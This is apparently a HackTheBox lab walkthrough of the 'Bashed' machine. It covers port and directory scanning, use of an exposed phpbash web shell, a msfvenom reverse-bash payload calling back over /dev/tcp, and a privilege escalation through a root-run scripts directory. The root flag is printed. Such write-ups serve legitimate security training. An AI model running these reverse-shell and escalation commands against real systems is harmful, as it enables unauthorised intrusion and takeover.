HackTheBox - Bashed Walkthrough

in #hackthebox7 years ago (edited)

Introduction

One of my first hackthebox walkthroughs' I'll cover overviews a rather simple yet unstable box: Bashed. Occasionally, the box name provides a hint to the flaw, or otherwise what direction to follow. In this case, Bashed appears to - but not confirmed - CVE-2014-6271 aka Shellshock. As I do in other walkthroughs, I'll cover enumeration, exploitation, root, and occasionally closing thoughts. There may be other solutions to the box, which I may miss.

Table of contents

Enumeration

I've started my initial scans of the boxs' address 10.10.10.68 with nmap. I've scanned all ports, from 1-65535.

Initiating NSE at 10:17
Completed NSE at 10:17, 0.52s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Nmap scan report for 10.10.10.68
Host is up (0.11s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.44 seconds
           Raw packets sent: 1717 (75.524KB) | Rcvd: 1019 (40.764KB)
root@kali:~/ctfs/hackthebox#

A simple web server. I dont know any hostnames for the box, so I'll assume that querying the IP shall provide a web page rather than some default web server.

Capture.PNG

Woohoo, we're in luck! A web page talking about a shell, called phpbash. Hey, its "even developed on this server", so where might that be?

2.PNG

I searched his github for information, however, guessing filesnames didn't appear to work. Afterwards, I ran a directory scan which returned promising results :)

root@kali:~/tools/dirsearch# python3 dirsearch.py -u http://10.10.10.68/ -w /usr
/share/dirb/wordlists/big.txt -e php -f

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 40936

Error Log: /root/tools/dirsearch/logs/errors-18-04-28_10-23-21.log

Target: http://10.10.10.68/

[10:23:43] Starting:
[10:24:01] 403 -  299B  - /.htaccess.php
[10:24:02] 403 -  299B  - /.htpasswd.php
[10:28:00] 200 -    0B  - /config.php
[10:28:12] 200 -    2KB - /css/
[10:28:27] 200 -    1KB - /dev/
[10:29:18] 200 -    2KB - /fonts/
[10:30:03] 403 -  292B  - /icons/
[10:30:06] 200 -    2KB - /images/
[10:30:31] 200 -    3KB - /js/
[10:32:12] 200 -  939B  - /php/
[10:33:20] 403 -  300B  - /server-status/
[10:34:32] 200 -   14B  - /uploads/

Task Completed

The rest look standard, so I'll skip those and look to /dev/, which appears out of place. Maybe it contains development version of phpbash?

Success on http://10.10.10.68/dev/phpbash.php!

Capture4.PNG

We have command execution, so why not drop a more proper shell. I'll generate one with msfvenom.

oot@kali:~/tools/dirsearch# ip addr show tun3
Device "tun3" does not exist.
root@kali:~/tools/dirsearch# ip addr show tun2
5: tun2: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 100
    link/none
    inet 10.10.14.242/23 brd 10.10.15.255 scope global tun2
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::10f0/64 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::a03f:4fc2:5ab2:7682/64 scope link stable-privacy
       valid_lft forever preferred_lft forever
root@kali:~/tools/dirsearch# msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.242 LPORT=7777 -f raw
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 66 bytes
0<&103-;exec 103<>/dev/tcp/10.10.14.242/7777;sh <&103 >&103 2>&103
root@kali:~/tools/dirsearch# ncat -vlp 7777
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:41664.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

I'll spawn a fake TTY with python -c 'import pty; pty.spawn("/bin/bash")' and enumerate further from there.

Escalation

One of the first things to check for on box is the sudo policy. Maybe you can run arbitrary scripts as root without a password? To do so, run sudo -ln.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bashed:/var/www/html/dev$ sudo -ln
sudo -ln
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/var/www/html/dev$

A script manager! the permissions NOPASSWD:ALL inform us we do not need a password to complete the sudo command, and I have full permissions to run as root.

However, after trying for the past few hours, I was unable to complete the action. Maybe something is missing, I'm not entirely sure. I saw directory however on root / called /scripts/. Checking in there, an arbitrary script. How does this come in play?

I checked process with a ps -ef | grep scripts and saw this entry

www-data@bashed:/$ ps -ef | grep scripts
ps -ef | grep scripts
root        916    877  0 07:28 pts/0    00:00:00 sudo -u scriptmanager vi /scripts/qwerty.py
scriptm+    917    916  0 07:28 pts/0    00:00:00 vi /scripts/qwerty.py
www-data   1585   1393  0 07:41 ?        00:00:00 sh -c cd /scripts; python -c "import pty; pty.spawn('/bin/bash')" 2>&1
www-data   1628   1612  0 07:42 ?        00:00:00 sh -c cd /scripts; python -c "import pty; pty.spawn('/bin/bash')" 2>&1
www-data   2425   1935  0 07:51 pts/18   00:00:00 grep scripts
www-data@bashed:/$

From this, we can gather that there are scripts running as root in /scripts/. Any script placed within the directory with the extension *.py will run as root!.

With this in mind, I wrote a simple OS execution to pop a shell, and achieve 'root'.

www-data@bashed:/scripts$ echo 'import os; os.system("cat /root/root.txt > /dev/
shm/.test.txt")' > test.py
www-data@bashed:/scripts$ cat test.py
import os; os.system("cat /root/root.txt > /dev/shm/.test.txt")
www-data@bashed:/scripts$ ls -lat
total 60
-rwxrwxrwx  1 scriptmanager scriptmanager    64 Apr 28 08:37 test.py
-rw-r--r--  1 scriptmanager scriptmanager 12288 Apr 28 08:36 .test.py.swp
drwxrwxrwx  2 scriptmanager scriptmanager  4096 Apr 28 08:36 .
-rw-r--r--  1 scriptmanager scriptmanager   217 Apr 28 08:36 t2.py
-rw-r--r--  1 scriptmanager scriptmanager   223 Apr 28 08:35 bla.py
-rw-r--r--  1 scriptmanager scriptmanager   216 Apr 28 08:21 omkv.py
-rw-------  1 www-data      www-data      12288 Apr 28 07:42 .test.py.swo
-rw-------  1 scriptmanager scriptmanager 12288 Apr 28 07:29 .qwerty.py.swp
drwxr-xr-x 23 root          root           4096 Dec  4 13:02 ..
www-data@bashed:/scripts$ cat test.py
import os; os.system("cat /root/root.txt > /dev/shm/.test.txt")
www-data@bashed:/scripts$ cd /dev/shm/
www-data@bashed:/dev/shm$ ls
www-data@bashed:/dev/shm$ ls -alt
total 0
drwxr-xr-x 19 root root 4240 Apr 28 07:26 ..
drwxrwxrwt  2 root root   40 Apr 28 07:26 .
www-data@bashed:/dev/shm$ ls -lat
total 4
-rw-r--r--  1 root root   33 Apr 28 08:39 .test.txt
drwxrwxrwt  2 root root   60 Apr 28 08:38 .
drwxr-xr-x 19 root root 4240 Apr 28 07:26 ..
www-data@bashed:/dev/shm$ cat .test.txt
cc4f0afe3a1026d402ba10329674a8e2
www-data@bashed:/dev/shm$

Thoughts

After completing the box, I did learn my assumption of Shellshock was incorrect. Instead, this was applicable to an older box, called Shocker. You can hopefully deduce the dangers on sudo policies as well, as we were able to run arbitrary queries as another user. This was a very simple box and I hope to provide a more detailed write up in the future on other boxes.